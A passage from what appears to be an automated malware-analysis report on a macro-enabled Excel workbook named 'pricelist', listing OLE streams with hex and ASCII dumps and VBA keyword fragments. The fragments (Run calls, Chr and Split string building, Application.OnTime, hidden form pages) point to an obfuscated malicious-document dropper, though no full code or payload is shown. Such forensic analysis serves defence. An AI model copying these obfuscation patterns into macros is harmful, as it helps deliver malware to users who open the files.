                                                                                                                                                            Data Raw:01 16 03 00 03 f0 00 00 00 2a 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 58 05 00 00 f0 09 00 00 00 00 00 00 01 00 00 00 ba 78 ca 26 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                            VBA Code Keywords

                                                                                                                                                            Keyword
                                                                                                                                                            Integer:
                                                                                                                                                            bycilke()
                                                                                                                                                            VB_Name
                                                                                                                                                            MiV(sem.value)
                                                                                                                                                            homepodd()
                                                                                                                                                            homepodd
                                                                                                                                                            Error
                                                                                                                                                            Integer)
                                                                                                                                                            bycilke
                                                                                                                                                            Function
                                                                                                                                                            ol).Name
                                                                                                                                                            "!"):
                                                                                                                                                            String
                                                                                                                                                            "ab":
                                                                                                                                                            Split(govs,
                                                                                                                                                            Randomize:
                                                                                                                                                            yellowsto(yel
                                                                                                                                                            Next:
                                                                                                                                                            ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)
                                                                                                                                                            yellowsto(Oa))))
                                                                                                                                                            Integer
                                                                                                                                                            yellowsto
                                                                                                                                                            ol).value
                                                                                                                                                            nimo(Int((UBound(nimo)
                                                                                                                                                            Replace(Vo,
                                                                                                                                                            Chr(sem.Row)
                                                                                                                                                            Sheets(ol).Cells(homepodd,
                                                                                                                                                            "ab"))
                                                                                                                                                            Split(kij(ol),
                                                                                                                                                            yellowsto(homepodd))
                                                                                                                                                            Rnd))
                                                                                                                                                            (Run(""
                                                                                                                                                            "moreP_"
                                                                                                                                                            Variant)
                                                                                                                                                            Attribute
                                                                                                                                                            Resume
                                                                                                                                                            pagesREviewsd(Optional
                                                                                                                                                            ecimovert(nimo
                                                                                                                                                            ecimovert
                                                                                                                                                            MsgBox
                                                                                                                                                            VBA Code
                                                                                                                                                            VBA File Name: Sheet1.cls, Stream Size: 1639
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                                                                            VBA File Name:Sheet1.cls
                                                                                                                                                            Stream Size:1639
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .
                                                                                                                                                            Data Raw:01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 fb 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                            VBA Code Keywords

                                                                                                                                                            Keyword
                                                                                                                                                            Index
                                                                                                                                                            VB_Name
                                                                                                                                                            VB_Creatable
                                                                                                                                                            Application.OnTime
                                                                                                                                                            VB_Exposed
                                                                                                                                                            Long)
                                                                                                                                                            ResizePagess()
                                                                                                                                                            VB_Customizable
                                                                                                                                                            "REviewsd"
                                                                                                                                                            VB_Control
                                                                                                                                                            MultiPage"
                                                                                                                                                            VB_TemplateDerived
                                                                                                                                                            MSForms,
                                                                                                                                                            False
                                                                                                                                                            Attribute
                                                                                                                                                            Private
                                                                                                                                                            VB_PredeclaredId
                                                                                                                                                            VB_GlobalNameSpace
                                                                                                                                                            VB_Base
                                                                                                                                                            ResizePagess
                                                                                                                                                            "pages"
                                                                                                                                                            VBA Code
                                                                                                                                                            VBA File Name: ThisWorkbook.cls, Stream Size: 999
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                            VBA File Name:ThisWorkbook.cls
                                                                                                                                                            Stream Size:999
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                            VBA Code Keywords

                                                                                                                                                            Keyword
                                                                                                                                                            False
                                                                                                                                                            VB_Exposed
                                                                                                                                                            Attribute
                                                                                                                                                            VB_Name
                                                                                                                                                            VB_Creatable
                                                                                                                                                            "ThisWorkbook"
                                                                                                                                                            VB_PredeclaredId
                                                                                                                                                            VB_GlobalNameSpace
                                                                                                                                                            VB_Base
                                                                                                                                                            VB_Customizable
                                                                                                                                                            VB_TemplateDerived
                                                                                                                                                            VBA Code

                                                                                                                                                            Streams

                                                                                                                                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 108
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x1CompObj
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:108
                                                                                                                                                            Entropy:4.18849998853
                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 284
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:284
                                                                                                                                                            Entropy:2.99555015364
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . _ . . . . . p r i c e l i s t . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 a8 00 00 00
                                                                                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 168
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:168
                                                                                                                                                            Entropy:2.89626404454
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . x . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . @ . _ . . . . . @ . . . . . J I & . . . . . . . . . . .
                                                                                                                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 78 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 04 00 00 00 40 00 00 00 08 00 00 00 4c 00 00 00 0c 00 00 00 58 00 00 00 0d 00 00 00 64 00 00 00 13 00 00 00 70 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 1e 00 00 00
                                                                                                                                                            Stream Path: MBD00102510/\x1CompObj, File Type: data, Stream Size: 115
                                                                                                                                                            General
                                                                                                                                                            Stream Path:MBD00102510/\x1CompObj
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:115
                                                                                                                                                            Entropy:4.80096587863
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Stream Path: MBD00102510/f, File Type: data, Stream Size: 178
                                                                                                                                                            General
                                                                                                                                                            Stream Path:MBD00102510/f
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:178
                                                                                                                                                            Entropy:2.56223021678
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
                                                                                                                                                            Data Raw:00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 00 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Stream Path: MBD00102510/i02/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                                                                            General
                                                                                                                                                            Stream Path:MBD00102510/i02/\x1CompObj
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:110
                                                                                                                                                            Entropy:4.63372611993
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Stream Path: MBD00102510/i02/f, File Type: data, Stream Size: 40
                                                                                                                                                            General
                                                                                                                                                            Stream Path:MBD00102510/i02/f
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:40
                                                                                                                                                            Entropy:1.54176014818
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Stream Path: MBD00102510/i02/o, File Type: empty, Stream Size: 0
                                                                                                                                                            General
                                                                                                                                                            Stream Path:MBD00102510/i02/o
                                                                                                                                                            File Type:empty
                                                                                                                                                            Stream Size:0
                                                                                                                                                            Entropy:0.0
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:
                                                                                                                                                            Data Raw:
                                                                                                                                                            Stream Path: MBD00102510/i03/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                                                                            General
                                                                                                                                                            Stream Path:MBD00102510/i03/\x1CompObj
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:110
                                                                                                                                                            Entropy:4.63372611993
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Stream Path: MBD00102510/i03/f, File Type: data, Stream Size: 40
                                                                                                                                                            General
                                                                                                                                                            Stream Path:MBD00102510/i03/f
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:40
                                                                                                                                                            Entropy:1.90677964945
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Stream Path: MBD00102510/i03/o, File Type: empty, Stream Size: 0
                                                                                                                                                            General
                                                                                                                                                            Stream Path:MBD00102510/i03/o
                                                                                                                                                            File Type:empty
                                                                                                                                                            Stream Size:0
                                                                                                                                                            Entropy:0.0
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:
                                                                                                                                                            Data Raw:
                                                                                                                                                            Stream Path: MBD00102510/o, File Type: data, Stream Size: 152
                                                                                                                                                            General
                                                                                                                                                            Stream Path:MBD00102510/o
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:152
                                                                                                                                                            Entropy:2.68720470607
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
                                                                                                                                                            Data Raw:00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80
                                                                                                                                                            Stream Path: MBD00102510/x, File Type: data, Stream Size: 48
                                                                                                                                                            General
                                                                                                                                                            Stream Path:MBD00102510/x
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:48
                                                                                                                                                            Entropy:1.42267983198
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00
                                                                                                                                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 55702
                                                                                                                                                            General
                                                                                                                                                            Stream Path:Workbook
                                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                            Stream Size:55702
                                                                                                                                                            Entropy:5.35171514759
                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                            Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . C . % 8 . . . . . . . X
                                                                                                                                                            Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 550
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Stream Size:550
                                                                                                                                                            Entropy:5.28107922141
                                                                                                                                                            Base64 Encoded:True
                                                                                                                                                            Data ASCII:I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 0 - D B B 2 9 D 5 C 1 4 7 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E E E C 1 D 3 1 E 5 F 1 D 7 F 5 D 7 F 5 D 7 F 5 D 7 F 5 " . . D P B = " D C D E 2 F 3 F F 3 2 C F 4 2 C F 4 2 C "
                                                                                                                                                            Data Raw:49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 30 2d 44 42 42 32 39 44 35 43 31 34 37 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d
                                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 86
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:86
                                                                                                                                                            Entropy:3.24455457963
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                                                                                                                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:3574
                                                                                                                                                            Entropy:4.45079869926
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                                            Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2060
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:2060
                                                                                                                                                            Entropy:3.45011283232
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . Y . n . M . . . W . . v _ . . . . . . . .
                                                                                                                                                            Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 187
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:187
                                                                                                                                                            Entropy:1.91493173134
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00
                                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 363
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:363
                                                                                                                                                            Entropy:2.21122978445
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 398
                                                                                                                                                            General
                                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:398
                                                                                                                                                            Entropy:2.07709195049
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . .
